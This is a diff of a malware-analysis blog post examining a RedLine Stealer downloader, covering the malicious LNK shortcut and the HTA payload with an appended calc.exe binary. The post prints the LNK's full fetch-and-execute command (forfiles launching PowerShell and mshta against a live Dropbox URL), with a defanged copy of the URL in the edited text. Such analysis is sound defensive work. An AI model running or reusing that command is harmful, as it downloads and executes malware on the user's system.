MZHeader/MZHeader.github.io/_posts/2024-03-01-deobfuscating-a-redline-stealer-downloader.md

 ## LNK File

-The initial payload is an LNK file, the easier way to review an LNK file is to view the target path, which in this case, shows the following:
+The initial payload is an LNK file, the easiest way to review an LNK file is to view the target path:
 ```powershell
 C:\Windows\System32\forfiles.exe /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
 ```

-A file is being downloaded and executed against mshta, meaning the payload is likely a HTA file (Microsoft HTML Application)
+When the LNK file is executed, a file is being downloaded from 'hxxps[://]dl.dropboxusercontent[.]com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han' and executed against mshta, meaning the payload is very likely a HTA file (Microsoft HTML Application)

 ## HTA File

-The [file](https://www.virustotal.com/gui/file/302ec5af12ccc15b5771b3ed2b951ddc708f757c2103a1d6e71790f03902025e/detection) seems to contain a lot of junk characters at the start, it then has script tags which mshta will read and execute, followed by an MZ header for the legitimate calc.exe binary, likely added as a defence evasion technique.
+The [payload](https://www.virustotal.com/gui/file/302ec5af12ccc15b5771b3ed2b951ddc708f757c2103a1d6e71790f03902025e/detection) seems to contain a lot of junk characters at the start, it then has script tags which mshta will read and execute, followed by an MZ Header, indicating a portable executable.

+The junk characters seem meaningless, and the PE is the legitimate binary of calc.exe, this was likely added as a defence evasion technique.

 **Initial Bytes:**
 ![image](https://github.com/MZHeader/MZHeader.github.io/assets/151963631/8ca5c1b5-4e02-4e0c-b10b-1e03e7e3cd30)